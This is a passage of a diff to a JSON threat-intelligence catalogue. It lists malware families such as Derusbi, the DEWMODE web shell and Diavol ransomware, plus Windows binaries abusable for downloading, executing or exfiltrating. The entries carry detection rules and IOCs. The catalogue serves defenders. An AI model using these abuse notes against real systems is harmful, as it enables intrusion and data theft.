[Denis](https://app.tidalcyber.com/software/df4002d2-f557-4f95-af7a-9a4582fb7068) shares several similarities to the [SOUNDBITE](https://app.tidalcyber.com/software/069538a5-3cb8-4eb4-9fbb-83867bb4d826) backdoor and has been used in conjunction with the [Goopy](https://app.tidalcyber.com/software/a75855fd-2b6b-43d8-99a5-2be03b544f34) backdoor.[[Cybereason Oceanlotus May 2017](https://app.tidalcyber.com/references/1ef3025b-d4a9-49aa-b744-2dbea10a0abf)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0354", + "source": "MITRE", + "tags": [ + "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "c0fe9859-e8de-4ce1-bc3c-b489e914a145", + "type": "used-by" + }, + { + "dest-uuid": "f25aab1a-0cef-4910-a85d-bb38b32ea41a", + "type": "similar" + } + ], + "uuid": "df4002d2-f557-4f95-af7a-9a4582fb7068", + "value": "Denis" + }, + { + "description": "[[FireEye Periscope March 2018](https://app.tidalcyber.com/references/8edb5d2b-b5c4-4d9d-8049-43dd6ca9ab7f)]", + "meta": { + "id": "b737bb44-6f18-412c-a84d-a08d66f7a0b2" + }, + "related": [ + { + "dest-uuid": "9222aa77-922e-43c7-89ad-71067c428fb2", + "type": "similar" + } + ], + "uuid": "92b622fe-1002-49f7-87ca-e97046f6ed40", + "value": "PHOTO" + }, + { + "description": "[Derusbi](https://app.tidalcyber.com/software/9222aa77-922e-43c7-89ad-71067c428fb2) is malware used by multiple Chinese APT groups.[[Novetta-Axiom](https://app.tidalcyber.com/references/0dd428b9-849b-4108-87b1-20050b86f420)][[ThreatConnect Anthem](https://app.tidalcyber.com/references/61ecd0b4-6cac-4d9f-8e8c-3d488fef6fec)] Both Windows and Linux variants have been observed.[[Fidelis Turbo](https://app.tidalcyber.com/references/f19877f1-3e0f-4c68-b6c9-ef5b0bd470ed)]", + "meta": { + "platforms": [ + "Linux", + "Windows" + ], + "software_attack_id": "S0021", + "source": "MITRE", + "tags": [ + "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "eadd78e3-3b5d-430a-b994-4360b172c871", + "type": "used-by" + }, + { + "dest-uuid": "90f4d3f9-3fe3-4a64-8dc1-172c6d037dca", + "type": "used-by" + }, + { + "dest-uuid": "43f826a1-e8c8-47b8-9b00-38e1b3e4293b", + "type": "used-by" + }, + { + "dest-uuid": "502223ee-8947-42f8-a532-a3b3da12b7d9", + "type": "used-by" + }, + { + "dest-uuid": "94379dec-5c87-49db-b36e-66abc0b81344", + "type": "similar" + }, + { + "dest-uuid": "92b622fe-1002-49f7-87ca-e97046f6ed40", + "type": "similar" + } + ], + "uuid": "9222aa77-922e-43c7-89ad-71067c428fb2", + "value": "Derusbi" + }, + { + "description": "[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]", + "meta": { + "id": "83c48bfd-5c8f-406f-ab7f-63a9bd17dcbd", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1863a7e2-6212-48a0-b109-15d0198b93e2", + "type": "similar" + } + ], + "uuid": "670ed300-364b-45ad-ad7f-732d13365571", + "value": "Desk.cpl" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Desktop Settings Control Panel\n\n**Author:** Hai Vaknin\n\n**Paths:**\n* C:\\Windows\\System32\\desk.cpl\n* C:\\Windows\\SysWOW64\\desk.cpl\n\n**Resources:**\n* [https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt](https://vxug.fakedoma.in/zines/29a/29a7/Articles/29A-7.030.txt)\n* [https://twitter.com/pabraeken/status/998627081360695297](https://twitter.com/pabraeken/status/998627081360695297)\n* [https://twitter.com/VakninHai/status/1517027824984547329](https://twitter.com/VakninHai/status/1517027824984547329)\n* [https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files](https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files)\n\n**Detection:**\n* Sigma: [file_event_win_new_src_file.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/file/file_event/file_event_win_new_src_file.yml)\n* Sigma: [proc_creation_win_lolbin_rundll32_installscreensaver.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_rundll32_installscreensaver.yml)\n* Sigma: [registry_set_scr_file_executed_by_rundll32.yml](https://github.com/SigmaHQ/sigma/blob/940f89d43dbac5b7108610a5bde47cda0d2a643b/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml)[[Desk.cpl - LOLBAS Project](/references/487a54d9-9f90-478e-b305-bd041af55e12)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5188", + "source": "Tidal Cyber", + "tags": [ + "7ad2b1d5-c228-4bf5-bf8e-c80a8fef0079", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "670ed300-364b-45ad-ad7f-732d13365571", + "type": "similar" + } + ], + "uuid": "1863a7e2-6212-48a0-b109-15d0198b93e2", + "value": "Desk" + }, + { + "description": "[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]", + "meta": { + "id": "7c4bf9f5-dfaa-46df-8803-83ae323f9f58", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "1b31652d-30bb-4c6e-bfe1-f2921a0aa64e", + "type": "similar" + } + ], + "uuid": "75e0d2df-7f93-4b5a-b085-4d2dfdac1348", + "value": "Desktopimgdownldr.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows binary used to configure lockscreen/desktop image\n\n**Author:** Gal Kristal\n\n**Paths:**\n* c:\\windows\\system32\\desktopimgdownldr.exe\n\n**Resources:**\n* [https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/](https://labs.sentinelone.com/living-off-windows-land-a-new-native-file-downldr/)\n\n**Detection:**\n* Sigma: [proc_creation_win_desktopimgdownldr_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_desktopimgdownldr_susp_execution.yml)\n* Sigma: [file_event_win_susp_desktopimgdownldr_file.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/file/file_event/file_event_win_susp_desktopimgdownldr_file.yml)\n* Elastic: [command_and_control_remote_file_copy_desktopimgdownldr.toml](https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/command_and_control_remote_file_copy_desktopimgdownldr.toml)\n* IOC: desktopimgdownldr.exe that creates non-image file\n* IOC: Change of HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\PersonalizationCSP\\LockScreenImageUrl[[Desktopimgdownldr.exe - LOLBAS Project](/references/1df3aacf-76c4-472a-92c8-2a85ae9e2860)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5100", + "source": "Tidal Cyber", + "tags": [ + "acc0e091-a071-4e83-b0b1-4f3adebeafa3", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "75e0d2df-7f93-4b5a-b085-4d2dfdac1348", + "type": "similar" + } + ], + "uuid": "1b31652d-30bb-4c6e-bfe1-f2921a0aa64e", + "value": "Desktopimgdownldr" + }, + { + "description": "[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]", + "meta": { + "id": "28423085-6247-4ae2-94bd-b4a66e148456", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "b99bdf39-8dcf-4bae-95af-b029d48cb579", + "type": "similar" + } + ], + "uuid": "5a91980c-cdb3-4dde-b38d-175c5af960f3", + "value": "DeviceCredentialDeployment.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Device Credential Deployment\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\DeviceCredentialDeployment.exe\n\n**Resources:**\nNone Provided\n\n**Detection:**\n* IOC: DeviceCredentialDeployment.exe should not be run on a normal workstation\n* Sigma: [proc_creation_win_lolbin_device_credential_deployment.yml](https://github.com/SigmaHQ/sigma/blob/ff5102832031425f6eed011dd3a2e62653008c94/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml)[[DeviceCredentialDeployment.exe - LOLBAS Project](/references/fef281e8-8138-4420-b11b-66d1e6a19805)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5101", + "source": "Tidal Cyber", + "tags": [ + "2a08c2eb-e90e-4bdb-a2dd-9da06de7ed25", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "5a91980c-cdb3-4dde-b38d-175c5af960f3", + "type": "similar" + } + ], + "uuid": "b99bdf39-8dcf-4bae-95af-b029d48cb579", + "value": "DeviceCredentialDeployment" + }, + { + "description": "[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]", + "meta": { + "id": "bb16053d-2311-404e-84e3-64574e4ad3ad", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "102714a0-6b18-4d05-83c2-dd2929ce685a", + "type": "similar" + } + ], + "uuid": "34e99ddb-8992-4b3a-acaf-e95bf601777e", + "value": "Devinit.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Visual Studio 2019 tool\n\n**Author:** mr.d0x\n\n**Paths:**\n* C:\\Program Files\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe\n* C:\\Program Files (x86)\\Microsoft Visual Studio\\*\\Community\\Common7\\Tools\\devinit\\devinit.exe\n\n**Resources:**\n* [https://twitter.com/mrd0x/status/1460815932402679809](https://twitter.com/mrd0x/status/1460815932402679809)\n\n**Detection:**\n* Sigma: [proc_creation_win_devinit_lolbin_usage.yml](https://github.com/SigmaHQ/sigma/blob/b02e3b698afbaae143ac4fb36236eb0b41122ed7/rules/windows/process_creation/proc_creation_win_devinit_lolbin_usage.yml)[[Devinit.exe - LOLBAS Project](/references/27343583-c17d-4c11-a7e3-14d725756556)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5213", + "source": "Tidal Cyber", + "tags": [ + "bb814941-0155-49b1-8f93-39626d4f0ddd", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "34e99ddb-8992-4b3a-acaf-e95bf601777e", + "type": "similar" + } + ], + "uuid": "102714a0-6b18-4d05-83c2-dd2929ce685a", + "value": "Devinit" + }, + { + "description": "[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]", + "meta": { + "id": "ece06fad-6fc1-4e81-a01d-16983b867a82", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "6e213e33-c2e5-494f-bc1a-bf672f95dcf8", + "type": "similar" + } + ], + "uuid": "9fcdac31-4219-4b10-83e6-b1c85f96de60", + "value": "Devtoolslauncher.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary will execute specified binary. Part of VS/VScode installation.\n\n**Author:** felamos\n\n**Paths:**\n* c:\\windows\\system32\\devtoolslauncher.exe\n\n**Resources:**\n* [https://twitter.com/_felamos/status/1179811992841797632](https://twitter.com/_felamos/status/1179811992841797632)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_devtoolslauncher.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_devtoolslauncher.yml)\n* IOC: DeveloperToolsSvc.exe spawned an unknown process[[Devtoolslauncher.exe - LOLBAS Project](/references/cb263978-019c-40c6-b6de-61db0e7a8941)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5214", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "9fcdac31-4219-4b10-83e6-b1c85f96de60", + "type": "similar" + } + ], + "uuid": "6e213e33-c2e5-494f-bc1a-bf672f95dcf8", + "value": "Devtoolslauncher" + }, + { + "description": "[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]", + "meta": { + "id": "dbe1da7a-4233-4a8e-84a1-daa8e7422edb", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "672d80fe-656e-4b1b-8234-ebf2c5339166", + "type": "similar" + } + ], + "uuid": "02bce9ff-2975-4b0a-a8ab-8aaba3660803", + "value": "devtunnel.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to enable forwarded ports on windows operating systems.\n\n**Author:** Kamran Saifullah\n\n**Paths:**\n* C:\\Users\\\\AppData\\Local\\Temp\\.net\\devtunnel\\\n* C:\\Users\\\\AppData\\Local\\Temp\\DevTunnels\n\n**Resources:**\n* [https://code.visualstudio.com/docs/editor/port-forwarding](https://code.visualstudio.com/docs/editor/port-forwarding)\n\n**Detection:**\n* IOC: devtunnel.exe binary spawned\n* IOC: *.devtunnels.ms\n* IOC: *.*.devtunnels.ms\n* Analysis: [https://cydefops.com/vscode-data-exfiltration](https://cydefops.com/vscode-data-exfiltration)[[devtunnel.exe - LOLBAS Project](/references/657c8b4c-1eee-4997-8461-c7592eaed9e8)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5252", + "source": "Tidal Cyber", + "tags": [ + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "02bce9ff-2975-4b0a-a8ab-8aaba3660803", + "type": "similar" + } + ], + "uuid": "672d80fe-656e-4b1b-8234-ebf2c5339166", + "value": "devtunnel" + }, + { + "description": "According to joint Cybersecurity Advisory AA23-158A (June 2023), DEWMODE is a web shell written in PHP that is designed to interact with a MySQL database. During a campaign from 2020 to 2021, threat actors exploited multiple zero-day vulnerabilities in internet-facing Accellion File Transfer Appliance (FTA) devices, installing DEWMODE web shells to exfiltrate data from compromised networks.[[Mandiant MOVEit Transfer June 2 2023](/references/232c7555-0483-4a57-88cb-71a990f7d683)]\n\n**Malpedia (Research)**: https://malpedia.caad.fkie.fraunhofer.de/details/php.dewmode\n\n**Malware Bazaar (Samples & IOCs)**: https://bazaar.abuse.ch/browse/tag/dewmode/", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Linux" + ], + "software_attack_id": "S5021", + "source": "Tidal Cyber", + "tags": [ + "a98d7a43-f227-478e-81de-e7299639a355", + "311abf64-a9cc-4c6a-b778-32c5df5658be" + ], + "type": "malware" + }, + "related": [], + "uuid": "ff0b0792-5dd0-4e10-8b84-8da93a0198aa", + "value": "DEWMODE" + }, + { + "description": "[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]", + "meta": { + "id": "26a2d51b-6d8b-45fa-a796-9d0453f3d5a7", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "b396eb52-3b6a-44e9-9534-d8b981a52192", + "type": "similar" + } + ], + "uuid": "92344064-ad27-4fa5-8d50-fa56ff279213", + "value": "Dfshim.dll" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ClickOnce engine in Windows used by .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Dfshim.dll - LOLBAS Project](/references/30503e42-6047-46a9-8189-e6caa5f4deb0)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5189", + "source": "Tidal Cyber", + "tags": [ + "91fd24c3-f371-4c3b-b997-cd85e25c0967", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "92344064-ad27-4fa5-8d50-fa56ff279213", + "type": "similar" + } + ], + "uuid": "b396eb52-3b6a-44e9-9534-d8b981a52192", + "value": "Dfshim" + }, + { + "description": "[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]", + "meta": { + "id": "6ff08a83-bfb2-44e6-b1da-596c71171e47", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "f85966ec-0c4d-4f7e-949f-bb73828bf601", + "type": "similar" + } + ], + "uuid": "a9e71535-14ff-4715-a9f4-fac62b04753e", + "value": "Dfsvc.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** ClickOnce engine in Windows used by .NET\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\Dfsvc.exe\n* C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\Dfsvc.exe\n\n**Resources:**\n* [https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf](https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf)\n* [https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe](https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Dfsvc.exe - LOLBAS Project](/references/7f3a78c0-68b2-4a9d-ae6a-6e63e8ddac3f)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5102", + "source": "Tidal Cyber", + "tags": [ + "18d6d91d-7df0-44c8-88fe-986d9ba00b8d", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "a9e71535-14ff-4715-a9f4-fac62b04753e", + "type": "similar" + } + ], + "uuid": "f85966ec-0c4d-4f7e-949f-bb73828bf601", + "value": "Dfsvc" + }, + { + "description": "[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]", + "meta": { + "id": "665e5831-6600-470e-a375-ba7fad39d729", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "054ddf05-e9f0-4d14-8493-2a1b2ddbefad", + "type": "similar" + } + ], + "uuid": "6e0bb5fd-f650-4ba0-bd6f-d6b90b1a7777", + "value": "Diantz.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary that package existing files into a cabinet (.cab) file\n\n**Author:** Tamir Yehuda\n\n**Paths:**\n* c:\\windows\\system32\\diantz.exe\n* c:\\windows\\syswow64\\diantz.exe\n\n**Resources:**\n* [https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz](https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/diantz)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_diantz_ads.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml)\n* Sigma: [proc_creation_win_lolbin_diantz_remote_cab.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml)\n* IOC: diantz storing data into alternate data streams.\n* IOC: diantz getting a file from a remote machine or the internet.[[diantz.exe_lolbas](/references/66652db8-5594-414f-8a6b-83d708a0c1fa)]", + "meta": { + "owner": "TidalCyberIan", + "platforms": [ + "Windows" + ], + "software_attack_id": "S5103", + "source": "Tidal Cyber", + "tags": [ + "96f9b39f-0c59-48a0-9702-01920c1293a7", + "303a3675-4855-4323-b042-95bb1d907cca", + "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" + ], + "type": "tool" + }, + "related": [ + { + "dest-uuid": "6e0bb5fd-f650-4ba0-bd6f-d6b90b1a7777", + "type": "similar" + } + ], + "uuid": "054ddf05-e9f0-4d14-8493-2a1b2ddbefad", + "value": "Diantz" + }, + { + "description": "[Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) is a ransomware variant first observed in June 2021 that is capable of prioritizing file types to encrypt based on a pre-configured list of extensions defined by the attacker. [Diavol](https://app.tidalcyber.com/software/d057b6e7-1de4-4f2f-b374-7e879caecd67) has been deployed by [Bazar](https://app.tidalcyber.com/software/b35d9817-6ead-4dbd-a2fa-4b8e217f8eac) and is thought to have potential ties to [Wizard Spider](https://app.tidalcyber.com/groups/0b431229-036f-4157-a1da-ff16dfc095f8).[[Fortinet Diavol July 2021](https://app.tidalcyber.com/references/28c650f2-8ce8-4c78-ab4a-cae56c1548ed)][[FBI Flash Diavol January 2022](https://app.tidalcyber.com/references/a1691741-9ecd-4b20-8cc9-b9bdfc1592b5)][[DFIR Diavol Ransomware December 2021](https://app.tidalcyber.com/references/eb89f18d-684c-4220-b2a8-967f1f8f9162)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0659", + "source": "MITRE", + "tags": [ + "5e7433ad-a894-4489-93bc-41e90da90019", + "7e7b0c67-bb85-4996-a289-da0e792d7172" + ], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "4e9bdf9a-4957-47f6-87b3-c76898d3f623", + "type": "similar" + } + ], + "uuid": "d057b6e7-1de4-4f2f-b374-7e879caecd67", + "value": "Diavol" + }, + { + "description": "[Dipsind](https://app.tidalcyber.com/software/226ee563-4d49-48c2-aa91-82999f43ce30) is a malware family of backdoors that appear to be used exclusively by [PLATINUM](https://app.tidalcyber.com/groups/f036b992-4c3f-47b7-a458-94ac133bce74). [[Microsoft PLATINUM April 2016](https://app.tidalcyber.com/references/d0ec5037-aa7f-48ee-8d37-ff8fb2c8c297)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S0200", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f036b992-4c3f-47b7-a458-94ac133bce74", + "type": "used-by" + }, + { + "dest-uuid": "e170995d-4f61-4f17-b60e-04f9a06ee517", + "type": "similar" + } + ], + "uuid": "226ee563-4d49-48c2-aa91-82999f43ce30", + "value": "Dipsind" + }, + { + "description": "[Disco](https://app.tidalcyber.com/software/194314e3-4edc-5346-96b6-d2d7bf5d830a) is a custom implant that has been used by [MoustachedBouncer](https://app.tidalcyber.com/groups/f31df12e-66ea-5a49-87bc-2bc1756a89fc) since at least 2020 including in campaigns using targeted malicious content injection for initial access and command and control.[[MoustachedBouncer ESET August 2023](https://app.tidalcyber.com/references/9070f14b-5d5e-5f6d-bcac-628478e01242)]", + "meta": { + "platforms": [ + "Windows" + ], + "software_attack_id": "S1088", + "source": "MITRE", + "tags": [], + "type": "malware" + }, + "related": [ + { + "dest-uuid": "f31df12e-66ea-5a49-87bc-2bc1756a89fc", + "type": "used-by" + }, + { + "dest-uuid": "e1445afd-c359-45ed-8f27-626dc4d5e157", + "type": "similar" + } + ], + "uuid": "194314e3-4edc-5346-96b6-d2d7bf5d830a", + "value": "Disco" + }, + { + "description": "[[Diskshadow.exe - LOLBAS Project](/references/27a3f0b4-e699-4319-8b52-8eae4581faa2)]", + "meta": { + "id": "4bd84850-5a38-448f-8497-402d8f6b500b", + "owner": "TidalCyberIan", + "owner_id": "bebdd211-52f4-4abc-94ff-b3a7df904561" + }, + "related": [ + { + "dest-uuid": "07c49566-5bea-44dc-b81f-e6c90bda9c39", + "type": "similar" + } + ], + "uuid": "84346cb2-601a-45ff-9d88-f0516cfaa688", + "value": "Diskshadow.exe" + }, + { + "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Diskshadow.exe is a tool that exposes the functionality offered by the volume shadow copy Service (VSS).\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\diskshadow.exe\n* C:\\Windows\\SysWOW64\\diskshadow.exe\n\n**Resources:**\n* [https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/](https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_diskshadow.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_lolbin_diskshadow.yml)\n* Sigma: [proc_creation_win_susp_shadow_copies_deletion.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_susp_shadow_copies_deletion.yml)\n* Elastic: 